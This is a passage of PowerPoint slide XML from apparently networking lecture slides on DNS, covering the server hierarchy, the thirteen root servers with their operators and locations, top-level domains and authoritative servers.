              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) to IP addresses.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Properties of DNS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Hierarchical name space divided into zones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Distributed over a collection of DNS servers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Hierarchy of DNS servers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Root servers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Top-level domain (TLD) servers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Authoritative DNS servers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Performing the translations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Local DNS servers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Resolver software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44</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945663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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB882A76-4B4D-0148-A975-9788DEDBCA42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8001000" y="6067928"/>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93286886-CFB1-D743-A3EC-1C88F848E740}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177602" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{347C3CD0-D88A-1544-8160-289F026FAD12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836614" y="125411"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS Root Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177603" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51489903-8398-1045-8569-F7ADDADC22DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1223962"/>
            <a:ext cx="11388435" cy="4786313"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>13 root servers (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.root-servers.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Labeled A through M</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177604" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B286E20F-9440-9B48-9D77-A17D415A6685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2005014" y="3089276"/>
            <a:ext cx="7234237"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177605" name="Picture 5" descr="worldf">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA6BE11B-27DD-FD4A-AD20-3975E8D98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3808916"/>
            <a:ext cx="5400675" cy="2667000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177606" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4E1276-42E2-344C-836F-42526E87A368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4129088" y="2978319"/>
            <a:ext cx="804862" cy="1511300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 963"/>
              <a:gd name="T1" fmla="*/ 0 h 1893"/>
              <a:gd name="T2" fmla="*/ 0 w 963"/>
              <a:gd name="T3" fmla="*/ 930 h 1893"/>
              <a:gd name="T4" fmla="*/ 963 w 963"/>
              <a:gd name="T5" fmla="*/ 1893 h 1893"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="963" h="1893">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="963" y="1893"/>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07" name="Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305D3412-0599-3046-B6AA-CD1D2975766D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2178051" y="5338933"/>
            <a:ext cx="263366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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>B USC-ISI Marina del Rey, CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>L ICANN Los Angeles, CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177608" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA1EFCE-AD5D-C34F-ACA8-828ABFB5D91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3313113" y="4676944"/>
            <a:ext cx="952500" cy="668338"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 582"/>
              <a:gd name="T1" fmla="*/ 426 h 426"/>
              <a:gd name="T2" fmla="*/ 582 w 582"/>
              <a:gd name="T3" fmla="*/ 0 h 426"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="582" h="426">
                <a:moveTo>
                  <a:pt x="0" y="426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="582" y="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09" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0244359-EB6B-CA45-99A3-3BACA88B4A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1006476" y="3472033"/>
            <a:ext cx="2573337"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>E NASA Mt View, CA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>F  Internet Software C. Palo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alto, CA (and 17 other locations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177610" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74BC27B1-560B-AF43-8E6A-229009355CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3184525" y="4376908"/>
            <a:ext cx="1022350" cy="225425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 582"/>
              <a:gd name="T1" fmla="*/ 426 h 426"/>
              <a:gd name="T2" fmla="*/ 582 w 582"/>
              <a:gd name="T3" fmla="*/ 0 h 426"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="582" h="426">
                <a:moveTo>
                  <a:pt x="0" y="426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="582" y="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1" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09DA410-2724-C842-9BD4-4755D9903B22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6777039" y="3281532"/>
            <a:ext cx="24987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r" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Autonomica,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Stockholm (plus 3 other locations)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177612" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29719E07-35BE-0D4B-BC8C-C00EA83BB0A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6321426" y="3524419"/>
            <a:ext cx="849313" cy="674688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 666 w 666"/>
              <a:gd name="T1" fmla="*/ 0 h 1005"/>
              <a:gd name="T2" fmla="*/ 0 w 666"/>
              <a:gd name="T3" fmla="*/ 1005 h 1005"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="666" h="1005">
                <a:moveTo>
                  <a:pt x="666" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1005"/>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3" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DBCF3E2-30F9-F04E-9127-73EFD89CE2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6823076" y="2927520"/>
            <a:ext cx="38449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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>K RIPE London (also Amsterdam, Frankfurt)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177614" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AA789A-8E80-4842-8CB9-99613958BE3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6094414" y="3145008"/>
            <a:ext cx="771525" cy="1158875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 922 w 922"/>
              <a:gd name="T1" fmla="*/ 0 h 1448"/>
              <a:gd name="T2" fmla="*/ 0 w 922"/>
              <a:gd name="T3" fmla="*/ 1448 h 1448"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="922" h="1448">
                <a:moveTo>
                  <a:pt x="922" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1448"/>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5" name="Text Box 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D62BEFF-7199-8C42-B9DD-69A0F274A644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8745539" y="3856710"/>
            <a:ext cx="15652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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>WIDE Tokyo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177616" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EB65811-55EF-C140-A25A-0918223906DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8375650" y="4086898"/>
            <a:ext cx="331788" cy="231775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 252 w 252"/>
              <a:gd name="T1" fmla="*/ 0 h 462"/>
              <a:gd name="T2" fmla="*/ 0 w 252"/>
              <a:gd name="T3" fmla="*/ 462 h 462"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="252" h="462">
                <a:moveTo>
                  <a:pt x="252" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="462"/>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7" name="Text Box 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804E0CF3-F285-884F-BA30-6B3E79D4A29C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4189413" y="2270295"/>
            <a:ext cx="3903662"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A Verisign, Dulles, VA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C Cogent, Herndon, VA (also Los Angeles)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D U Maryland College Park, MD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>G US DoD Vienna, VA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>H ARL Aberdeen, MD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>J Verisign, ( 11 locations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7430515C-DF9A-4F4D-B302-995489DC18E5}"/>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410805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Domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391440" y="1568095"/>
            <a:ext cx="11582400" cy="4788256"/>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Domains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Generic domains (e.g., com, org, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Country domains (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uk</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fr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, ca, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Typically managed professionally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-28575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Network Solutions maintains servers for “com”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-28575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Educause maintains servers for “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a: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Authoritative DNS servers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Provide public records for hosts at an organization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For the organization’s servers (e.g., Web and mail)</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Can be maintained locally or by a service provider</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46</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05647" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
